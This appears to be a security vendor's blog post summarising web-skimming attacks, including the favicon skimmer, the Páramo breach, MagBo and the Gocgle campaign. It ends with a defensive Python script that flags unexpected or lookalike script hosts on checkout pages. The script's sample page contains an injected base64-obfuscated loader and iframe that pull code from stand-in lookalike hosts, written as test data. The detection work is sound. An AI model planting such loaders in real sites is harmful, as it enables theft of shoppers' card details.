The Malicious Gocgle Campaign Targeting Customers’ Payment Details

The COVID-19 virus epidemic has seen a 23% rise in visitors to UK independent ecommerce sites. On a global scale, many companies have transitioned to fully ecommerce-based business practices and are seeing an increase in online shoppers. This paradigm shift in business continuity means websites are increasingly vulnerable to being attacked. 

Our sources state that there has been a 20% increase in web-skimming attacks since the outbreak of the COVID-19 virus, and this month we have witnessed some high-profile Magecart attacks. 

Latest Client-Side Security News:

  • Favicon Skimmer
  • 1,236 infected websites
  • Páramo
  • MagBo
  • Gocgle Campaign

Favicon Skimmer

On May 6th, Bleeping Computer reported that hackers created a fake icon portal to host and load a JavaScript web-skimmer camouflaged as a favicon. The JavaScript is then loaded onto compromised ecommerce portals to steal customers’ credit card information. 

Malwarebytes published a report explaining how several compromised Magento websites loaded a web-skimmer instead of the website favicon on their checkout pages, replacing the sites’ legitimate checkout option.

(Compromised website – Image Credit: Malwarebytes via Bleeping Computer)

As in other web-skimming attacks, the hackers went to great lengths to evade detection, including setting up a fake icon-hosting website at myicons[.]net. This site loaded all of its content from the legitimate iconarchive.com portal inside an iframe, so it looked genuine to a casual visitor.

Malwarebytes discovered that the attackers served a benign image from myicons[.]net/d/favicon.png on every page except the checkout pages. Once a customer reached checkout, the favicon PNG was swapped for malicious JavaScript designed to steal credit card information.

This attack was reported at the beginning of May when it was only a week old, and therefore only a handful of websites were affected at this time.

1,236 infected websites

Security researcher Max Kersten discovered 1,236 infected websites. Bleeping Computer reported the discovery, explaining how Kersten started from a single domain that hosted a skimmer and the scanning service URLscan.io.

Kersten spent 5 evenings manually checking each website's location and industry. He reported that most of the affected shops were in the US, followed by unknown locations, India and the UK. As seen in the graph below, the majority of hacked websites were product-based, followed by unknown industry, food, services, and adult entertainment.

(Impacted branches – Image Credit: Max Kersten)

Unsurprisingly, Kersten received no replies to the 200 notifications he sent to website owners. In his report, Kersten provides the full list of domains where a credit card skimmer was detected. 

Páramo

This month we witnessed a high-profile attack on British outdoor clothing retailer Páramo. On May 19th, The Register reported the attack on the ecommerce company, which lasted for almost 8 months, from July 2019 to March 2020. In that time frame, 3,743 customers had their payment details stolen.

In a notice, the company told customers that they had discovered a “…small piece of computer code covertly installed within our website”, continuing: “This code copied card details entered, destined for PayPal and additionally sent them on to the attacker’s server. The data transferred was name, address, card number and CVV code.”

Although the company had security scans set up, they failed to detect the malicious code. Páramo’s IT Director, Jason Martin, explains how the hack took place: “the hackers’ method used a PHP file which modified our IFRAME src so that it still loaded the PayPal code, but also loaded an external JavaScript file”. The malicious JavaScript file was named gcore.js and was hosted on a third-party URL.

The company has now removed the malicious code, patched the vulnerability, and is investigating Attack Detection tools to proactively monitor for other client-side attacks in the future.

MagBo

This month, ZDNet reported that more than 43,000 hacked servers were available for sale on the cybercrime store MagBo. Some of the servers on offer belong to local and state governments, hospitals, and financial organisations.

(Magbo Ad on a hacking forum – Image Credit: ZDNet)

MagBo is an online marketplace for buying and selling access to hacked servers. Launched in 2018, the portal has grown more than 14-fold, from 3,000 sites listed in September 2018 to 43,000 in May 2020. MagBo has sold access to more than 150,000 sites in total and is believed to have made more than $750,000 in revenue.

Gocgle Campaign

Domain spoofing is a popular technique for attackers to avoid detection and has been seen in some high-profile Magecart attacks, including the British Airways hack, in which a malicious skimmer exfiltrated card details to the spoof domain ‘baways[.]com’.

Another popular target for spoofing is third-party services such as Hotjar, jQuery, and especially Google products. In the past, the legitimate domain ‘google-analytics.com’ has been impersonated by ‘google-anaiytic.com’ and ‘g-analytics.com’. Google products such as Google Analytics and Google Tag Manager are often impersonated precisely because the legitimate products are so widely used, so one more request to a Google-looking host draws little attention. Such domain-spoofing attacks have been observed as early as 2016.

Security Boulevard reports on cybersecurity company Reflectiz’s recent discoveries. According to the firm, hundreds of websites are already infected by the malicious Gocgle campaign, which was first seen in late 2019 and is still active.

The Gocgle campaign is linked to other malicious campaigns observed in the last few years, all of which are hosted in Russia.

(Linked campaigns – Image credit: Security Boulevard)

The hackers use three techniques to avoid detection: Google domain spoofing, base64 encoding, and referrer switching.

Once the attackers discovered a vulnerability, they injected malicious code into the website to harvest sensitive data. By obfuscating the malicious URL with base64 encoding, attackers can insert a single line of code into the website’s source, minimising the chance of detection by manual code review and static code analysis.

The referrer tells a web page where the user has come from. The hackers use it to evade security teams who scan websites for new malicious code by replaying user journeys: if the referrer does not appear to come from a legitimate consumer (one with a browsing history), the malicious code is not loaded and the server returns the regular google-analytics scripts instead.

Avoiding detection is a key goal, so that hackers can continue to steal payment information for as long as possible. One way they do this is by not interfering with the regular processes on ecommerce sites. Because Google Analytics is so commonly used, the attackers take care not to disrupt the real function of Google Analytics or the checkout process, to avoid raising suspicion.
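As an added example, not RapidSpike's product code and not code from any of the reports cited above, the following Python script applies the two detection angles these sections describe: the Páramo case, where an iframe src was modified to pull in an extra external script, and the Gocgle campaign, where the loader URL is hidden in a base64 literal and points at a Google lookalike domain. It parses a checkout page, extracts every script and iframe source, decodes base64 literals found in inline scripts, and flags any host that is not on an assumed allowlist, adding a note when the host is a one- or two-character lookalike of a commonly impersonated third party. The allowlist, the `.test` hosts and the sample page are all constructed for the example.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a checkout page is expected to load scripts and iframes from.
# Assumed allowlist for a hypothetical shop; a real one comes from the site's own inventory.
ALLOWED_HOSTS = {"www.example-shop.test", "www.paypal.com", "www.google-analytics.com"}

# Legitimate third parties the article says attackers impersonate with lookalike domains.
IMPERSONATED_BRANDS = ["google-analytics.com", "googletagmanager.com", "jquery.com", "hotjar.com"]


class ResourceCollector(HTMLParser):
    """Collect src attributes of <script>/<iframe> tags and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.sources = []   # (tag, src) pairs
        self.inline = []    # bodies of inline <script> blocks
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe") and attrs.get("src"):
            self.sources.append((tag, attrs["src"]))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def decoded_urls(script_text):
    """Return http(s) URLs hidden inside base64 literals in a script body."""
    urls = []
    for match in B64_RE.finditer(script_text):
        try:
            blob = base64.b64decode(match.group(0), validate=True).decode("ascii")
        except Exception:  # not valid base64, or not text: skip it
            continue
        urls.extend(URL_RE.findall(blob))
    return urls


def levenshtein(a, b):
    """Edit distance, used to spot one- or two-character lookalikes such as gocgle/google."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host):
    """Return the brand domain whose second-level label this host mimics, or None."""
    labels = host.split(".")
    if len(labels) < 2:
        return None
    for brand in IMPERSONATED_BRANDS:
        brand_label = brand.split(".")[0]
        if labels[-2] != brand_label and levenshtein(labels[-2], brand_label) <= 2:
            return brand
    return None


def audit_page(html, allowed=ALLOWED_HOSTS):
    """Flag every external script/iframe host (plain or base64-hidden) not on the allowlist."""
    parser = ResourceCollector()
    parser.feed(html)
    candidates = list(parser.sources)
    for script in parser.inline:
        candidates += [("base64-in-script", url) for url in decoded_urls(script)]
    findings = []
    for where, url in candidates:
        host = urlparse(url).hostname or ""
        if not host or host in allowed:   # relative URLs and known hosts are fine
            continue
        brand = lookalike_of(host)
        reason = f"lookalike of {brand}" if brand else "host not in allowlist"
        findings.append((where, host, reason))
    return findings


# Constructed checkout page: a legitimate GA script and PayPal iframe, plus an injected
# iframe pointing at a lookalike host and a one-line loader with a base64-hidden URL.
HIDDEN_URL = base64.b64encode(b"https://google-anaiytic.test/gc.js").decode()
CHECKOUT_HTML = f"""
<html><head>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="/static/checkout.js"></script>
</head><body>
<iframe src="https://www.paypal.com/checkout"></iframe>
<iframe src="https://gocgle-analytics.test/gcore.js"></iframe>
<script>var s=document.createElement('script');s.src=atob('{HIDDEN_URL}');document.head.appendChild(s);</script>
</body></html>
"""

if __name__ == "__main__":
    for where, host, reason in audit_page(CHECKOUT_HTML):
        print(f"{where}: {host} ({reason})")
```

Because the Gocgle servers return the regular google-analytics scripts when the referrer does not look like a real shopper, the HTML passed to `audit_page()` should be captured from a genuine browser session on the checkout page rather than fetched by a bare crawler; a clean result from a crawler proves little. The allowlist is the primary control; the lookalike note only explains why a flagged host was chosen, and a host such as g-analytics.com would still be caught purely because it is not on the list.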

RapidSpike security researchers have investigated the Magecart attacks mentioned above. We can confidently say our Attack Detection would have detected these types of attack. Attack Detection takes less than 5 minutes to set up and will alert you to any untrusted data on your ecommerce site.

Worried about being attacked? Detect web-skimming, formjacking and supply chain attacks, and easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Client-Side Security: Attack Detection.